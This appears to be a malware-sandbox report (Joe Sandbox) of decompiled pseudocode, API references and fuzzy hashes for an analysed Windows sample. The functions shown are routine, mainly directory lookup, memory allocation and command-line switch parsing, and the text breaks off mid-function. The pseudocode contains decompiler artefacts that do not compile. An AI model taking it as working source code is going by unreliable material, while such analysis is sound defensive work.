                                                                                                                                                                                                                                            0x00a065d2
                                                                                                                                                                                                                                            0x00a065d1
                                                                                                                                                                                                                                            0x00a065d1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a065dc
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A08B3E,00A08B3F,00000001,00A08B3E,-00000003,?,00A060EC,00A01140,?), ref: 00A065BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                            • Opcode ID: 4673744771ec4d73af61e3d740a8c5d8e547a0973d119f1086320d95cc1adf76
                                                                                                                                                                                                                                            • Instruction ID: 49754a875a2912940d899c19c79b0f8cd9e0c78d0fdb6d96747626b5f5616391
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4673744771ec4d73af61e3d740a8c5d8e547a0973d119f1086320d95cc1adf76
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49F042321042585FD3314A1DBC84B66BFDD9B85354F14015EE8DAC3385CA656D5683B0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A0621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E00A0597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A0623F
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                              • Part of subcall function 00A06285: GetLastError.KERNEL32(00A05BBC), ref: 00A06285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            • Opcode ID: ddfcd668e6182d5f63b290a01fd33b3588a2c98f083d7242c8c271b0c0022368
                                                                                                                                                                                                                                            • Instruction ID: 78a102782b8ce327ad350f492f8e214488e4be9642e8073c90f78df5019f5031
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddfcd668e6182d5f63b290a01fd33b3588a2c98f083d7242c8c271b0c0022368
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCF0B4B0B0020C6BE750EF74AE02BFA32A8DB58304F400069BA86D60D1DD749D568654
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A04B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0xa08d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0xa08d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0xa08d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0xa08d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A04FA1,00000000), ref: 00A04B98
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 9fee1c1810b2a60d72e26f7ccfb6032864b313a2e43d9c4d9316a9cacde32cd9
                                                                                                                                                                                                                                            • Instruction ID: 5ddc67cd1c3adc46ed42981e55d5f5cdcab9afb779a113f3c9fb70a2ec5d44e2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fee1c1810b2a60d72e26f7ccfb6032864b313a2e43d9c4d9316a9cacde32cd9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF01271500B0C9EDB71CF39DC00652BBE4BBA53603100B2E95EED21D0EB34A861DB98
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
E00A066AE(CHAR* __ecx) {
    unsigned int _t1;

    _t1 = GetFileAttributesA(__ecx); // executed
    if(_t1 != 0xffffffff) {
        return  !(_t1 >> 4) & 0x00000001;
    } else {
        return 0;
    }
}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00A04777,?,00A04E38,?), ref: 00A066B1
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: 0fd75034f83e93df4fe82b4761976c403a92803bcf3f4a48a7480f823fd49e87
                                                                                                                                                                                                                                            • Instruction ID: ce7d1e5296317233a8d413d2f2eae70e3701e24625a79e9eefb81bd70405b2c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0fd75034f83e93df4fe82b4761976c403a92803bcf3f4a48a7480f823fd49e87
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BB0927662254842AA244B717C6955A2941A6D133ABE42B90F032C01E0CA3EC897D004
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
E00A04CA0(long _a4) {
    void* _t2;

    _t2 = GlobalAlloc(0, _a4); // executed
    return _t2;
}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A04CAA
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 5c9fd04a9a27d6cfd4184fb4bbfcaede2cc6c7ede76e25ec3c432917f1fb0fe8
                                                                                                                                                                                                                                            • Instruction ID: cbd25cc2841f3b6da2baafe76d695fcdcb1a4d74a8d7f618232a21d57e29f29f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c9fd04a9a27d6cfd4184fb4bbfcaede2cc6c7ede76e25ec3c432917f1fb0fe8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72B0123204430CB7CF001FC2EC09F853F1DE7C4761F140000F60C454508A7294128696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
E00A04CC0(void* _a4) {
    void* _t2;

    _t2 = GlobalFree(_a4); // executed
    return _t2;
}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A05C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A06CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E00A06E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E00A0597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E00A06CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E00A044B9(0, 0x521, 0xa01140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0xa08588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E00A0667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A0667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00A05C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00A01680(0xa08c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E00A0667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00A0667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xa08a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00A05C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xa08b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xa08a3a;
																}
																E00A01680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00A0658A(_t218, 0x104, 0xa01140);
																if(E00A031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0xa08a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0xa08a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0xa08a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0xa08a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0xa08a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0xa09a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0xa09a2c =  *0xa09a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0xa08d48 =  *0xa08d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
